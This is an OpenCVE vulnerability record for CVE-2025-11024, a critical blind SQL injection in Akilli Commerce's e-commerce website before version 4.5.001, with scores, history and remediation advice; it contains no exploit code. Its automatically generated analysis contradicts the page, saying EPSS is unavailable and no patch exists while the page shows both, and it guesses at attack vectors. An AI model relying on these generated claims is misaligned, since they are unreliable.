Description
Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website allows Blind SQL Injection.

This issue affects E-Commerce Website: before 4.5.001.
Published: 2026-05-14
Score: 9.8 Critical
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An improper neutralization of special elements used in an SQL command allows a blind SQL injection vulnerability in Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website. This is a classic input validation flaw (CWE‑89) that enables an attacker to probe the backend database indirectly through returned error messages or timing differences, potentially revealing sensitive data such as customer information, order details, or authentication credentials.

Affected Systems

Vulnerable to Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website versions prior to 4.5.001. Systems operating those releases are susceptible to injection exploits via user input fields exposed by the web interface.

Risk and Exploitability

The CVSS score of 9.8 indicates a critical severity, and although EPSS is not available, the high score and the nature of blind SQL injection imply a non‑negligible risk of exploitation. The vulnerability is not listed in the CISA KEV catalog, but the lack of mitigation or patch information suggests it could be exploited from the public internet. Based on the description, the likely attack vector is through the web form inputs that accept unescaped SQL commands, such as product search or login fields.

Generated by OpenCVE AI on May 14, 2026 at 11:22 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Akilli Commerce E‑Commerce Website to version 4.5.001 or later to eliminate the vulnerable code path.
  • Implement strict input validation and parameterized queries in any database interactions to prevent SQL injection, following the CWE‑89 guidance on sanitization.
  • Configure the database user credentials for the web application with the minimum privileges necessary for its operation, limiting the potential damage from an injection exploit.

Generated by OpenCVE AI on May 14, 2026 at 11:22 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Thu, 14 May 2026 20:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Thu, 14 May 2026 11:45:00 +0000

Type Values Removed Values Added
First Time appeared Akilli Commerce Software Technologies Ltd. Co.
Akilli Commerce Software Technologies Ltd. Co. e-commerce Website
Vendors & Products Akilli Commerce Software Technologies Ltd. Co.
Akilli Commerce Software Technologies Ltd. Co. e-commerce Website

Thu, 14 May 2026 10:00:00 +0000

Type Values Removed Values Added
Description Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website allows Blind SQL Injection. This issue affects E-Commerce Website: before 4.5.001.
Title SQLi in Akıllı Ticaret's E-Commerce Pack
Weaknesses CWE-89
References
Metrics cvssV3_1

{'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}

Subscriptions

Akilli Commerce Software Technologies Ltd. Co. E-commerce Website
cve-icon MITRE

Status: PUBLISHED

Assigner: TR-CERT

Published:

Updated: 2026-05-14T19:10:36.914Z

Reserved: 2025-09-26T08:07:34.606Z

Link: CVE-2025-11024

cve-icon Vulnrichment

Updated: 2026-05-14T19:10:28.127Z

cve-icon NVD

Status : Deferred

Published: 2026-05-14T10:16:17.760

Modified: 2026-05-14T16:20:13.477

Link: CVE-2025-11024

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-14T11:30:16Z

Weaknesses